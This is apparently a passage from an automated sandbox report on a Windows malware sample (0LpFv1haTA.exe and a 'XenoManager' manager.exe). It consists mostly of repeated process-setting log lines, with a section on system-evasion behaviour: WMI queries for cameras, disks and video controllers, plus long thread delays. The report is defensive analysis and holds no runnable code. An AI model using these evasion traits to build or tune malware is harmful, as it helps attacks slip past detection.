                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\manager.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\manager.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\manager.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\manager.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\manager.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\manager.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\manager.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\manager.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\manager.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\manager.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\manager.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\manager.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\manager.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\manager.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\manager.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe - WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe - WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE DriveType = 3
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe - WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\Desktop\0LpFv1haTA.exe - Memory allocated: 19457EB0000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\0LpFv1haTA.exe - Memory allocated: 194719C0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe - Memory allocated: 21F0F7E0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe - Memory allocated: 21F291E0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe - Memory allocated: 1E449B50000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe - Memory allocated: 1E461D40000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe - Memory allocated: 19233150000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe - Memory allocated: 1924CB50000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\manager.exe - Memory allocated: 2370000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\manager.exe - Memory allocated: 2500000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\manager.exe - Memory allocated: 4500000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe - Memory allocated: 30D0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe - Memory allocated: 3240000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe - Memory allocated: 5240000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe - Memory allocated: ED0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe - Memory allocated: 2CA0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe - Memory allocated: 11E0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe - Memory allocated: 1B2AFA60000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe - Memory allocated: 1B2C9440000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe - Memory allocated: 289898E0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe - Memory allocated: 289A3340000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe - Memory allocated: 1ADB34F0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe - Memory allocated: 1ADCD070000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\0LpFv1haTA.exe - Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe - Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe - Thread delayed: delay time: 600000
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe - Thread delayed: delay time: 599875
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe - Thread delayed: delay time: 599762
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe - Thread delayed: delay time: 599649
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe - Thread delayed: delay time: 599547
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe - Thread delayed: delay time: 599422
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe - Thread delayed: delay time: 599313
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe - Thread delayed: delay time: 599188
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe - Thread delayed: delay time: 599078
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe - Thread delayed: delay time: 598969
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe - Thread delayed: delay time: 598844
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe - Thread delayed: delay time: 598725
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe - Thread delayed: delay time: 598625
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe - Thread delayed: delay time: 598516
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe - Thread delayed: delay time: 598406
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe - Thread delayed: delay time: 598297
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe - Thread delayed: delay time: 598187
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe - Thread delayed: delay time: 598078
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe - Thread delayed: delay time: 597969
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe - Thread delayed: delay time: 597844
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe - Thread delayed: delay time: 597731
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe - Thread delayed: delay time: 597625
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe - Thread delayed: delay time: 597516
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe - Thread delayed: delay time: 597406
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe - Thread delayed: delay time: 597296
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe - Thread delayed: delay time: 597187
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe - Thread delayed: delay time: 597076
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe - Thread delayed: delay time: 596969
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe - Thread delayed: delay time: 596857
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe - Thread delayed: delay time: 596738
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe - Thread delayed: delay time: 596624
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe - Thread delayed: delay time: 596500
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe - Thread delayed: delay time: 596391
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe - Thread delayed: delay time: 596281
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe - Thread delayed: delay time: 596172
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe - Thread delayed: delay time: 596062
